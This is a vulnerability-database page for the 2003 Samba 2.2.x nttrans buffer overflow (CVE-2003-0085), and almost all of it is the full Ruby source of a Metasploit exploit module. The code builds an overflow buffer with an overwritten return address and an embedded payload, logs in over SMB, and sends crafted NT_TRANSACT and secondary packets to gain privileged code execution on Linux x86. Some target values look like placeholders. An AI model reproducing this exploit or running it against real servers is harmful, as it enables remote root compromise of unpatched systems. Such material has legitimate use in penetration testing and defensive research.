Samba 2.2.x nttrans Overflow

🗓️ 07 Apr 2003 00:00:00Reported by RootType

Samba 2.2.x nttrans overflow exploit with vulnerabilities for Linux x86 systems.

Reporter	Title	Published	Views	Family All 29
Tenable Nessus	Samba < 2.2.8 Fragment Reassembly Overflow / Arbitrary File Overwrite	20 Aug 200400:00	–	nessus
Tenable Nessus	Samba-TNG < 0.3.1 Multiple Vulnerabilities (deprecated)	20 Aug 200400:00	–	nessus
Tenable Nessus	Debian DSA-262-1 : samba - remote exploit	29 Sep 200400:00	–	nessus
Tenable Nessus	Mandrake Linux Security Advisory : samba (MDKSA-2003:032)	31 Jul 200400:00	–	nessus
Tenable Nessus	RHEL 2.1 : samba (RHSA-2003:096)	6 Jul 200400:00	–	nessus
Tenable Nessus	Samba < 2.2.8 Multiple Vulnerabilities	15 Mar 200300:00	–	nessus
Tenable Nessus	Samba TNG < 0.3.1 Multiple Remote Vulnerabilities	22 Mar 200300:00	–	nessus
CVE	CAN-2003-0085	6 Aug 202410:41	–	cve
CVE	CVE-2003-0085	18 Mar 200305:00	–	cve
Circl	CVE-2003-0085	28 Apr 201000:00	–	circl


                                                ##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::SMB

    def initialize(info = {})
        super(update_info(info, 
            'Name'           => 'Samba nttrans Overflow',
            'Description'    => %q{
                
            },
            'Author'         => [ 'hdm' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision$',
            'References'     =>
                [
                    [ 'CVE', '2003-0085' ],
                    [ 'OSVDB', '6323' ],
                    [ 'BID', '7106' ],
                ],
            'Privileged'     => true,
            'Payload'        =>
                {
                    'Space'    => 1024,
                    'BadChars' => "\x00",
                    'MinNops'  => 512,
                },
            'Targets'        => 
                [
                    ["Samba 2.2.x Linux x86",  
                        {
                            'Arch' => ARCH_X86,
                            'Platform' => 'linux',
                            'Rets' => [0x01020304, 0x41424344],
                        },
                    ],
                ],
            'DisclosureDate' => 'Apr 7 2003'
            ))
            
            register_options(
                [
                    Opt::RPORT(139)
                ], self.class)
                    
    end

    def exploit
        
        # 0x081fc968
        
        pattern = Rex::Text.pattern_create(12000)
    
        pattern[532, 4] = [0x81b847c].pack('V')
        pattern[836, payload.encoded.length] = payload.encoded

    #   0x081b8138


        connect
        smb_login

        targ_address = 0xfffbb7d0   
        
        #
        # Send a NTTrans request with ParameterCountTotal set to the buffer length
        #

        subcommand   = 1
        param        = ''
        body         = ''
        setup_count  = 0
        setup_data   = ''
        data = param + body

        pkt = CONST::SMB_NTTRANS_PKT.make_struct
        self.simple.client.smb_defaults(pkt['Payload']['SMB'])
        
        base_offset = pkt.to_s.length + (setup_count * 2) - 4
        param_offset = base_offset
        data_offset = param_offset + param.length
        
        pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
        pkt['Payload']['SMB'].v['Flags1'] = 0x18
        pkt['Payload']['SMB'].v['Flags2'] = 0x2001
        pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
        
        pkt['Payload'].v['ParamCountTotal'] =12000
        pkt['Payload'].v['DataCountTotal'] = body.length
        pkt['Payload'].v['ParamCountMax'] = 1024
        pkt['Payload'].v['DataCountMax'] = 65504
        pkt['Payload'].v['ParamCount'] = param.length
        pkt['Payload'].v['ParamOffset'] = param_offset
        pkt['Payload'].v['DataCount'] = body.length
        pkt['Payload'].v['DataOffset'] = data_offset
        pkt['Payload'].v['SetupCount'] = setup_count
        pkt['Payload'].v['SetupData'] = setup_data
        pkt['Payload'].v['Subcommand'] = subcommand
                
        pkt['Payload'].v['Payload'] = data
        
        self.simple.client.smb_send(pkt.to_s)
        ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
        
        #
        # Send a NTTrans secondary request with the magic displacement
        #

        param = pattern
        body  = ''
        data  = param + body

        pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
        self.simple.client.smb_defaults(pkt['Payload']['SMB'])
        
        base_offset = pkt.to_s.length - 4
        param_offset = base_offset
        data_offset = param_offset + param.length
        
        pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
        pkt['Payload']['SMB'].v['Flags1'] = 0x18
        pkt['Payload']['SMB'].v['Flags2'] = 0x2001
        pkt['Payload']['SMB'].v['WordCount'] = 18
        
        pkt['Payload'].v['ParamCountTotal'] = param.length
        pkt['Payload'].v['DataCountTotal'] = body.length
        pkt['Payload'].v['ParamCount'] = param.length
        pkt['Payload'].v['ParamOffset'] = param_offset
        pkt['Payload'].v['ParamDisplace'] = targ_address
        pkt['Payload'].v['DataCount'] = body.length
        pkt['Payload'].v['DataOffset'] = data_offset
                
        pkt['Payload'].v['Payload'] = data
        
        self.simple.client.smb_send(pkt.to_s)
        ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)


        handler

    end

end

07 Apr 2003 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.86073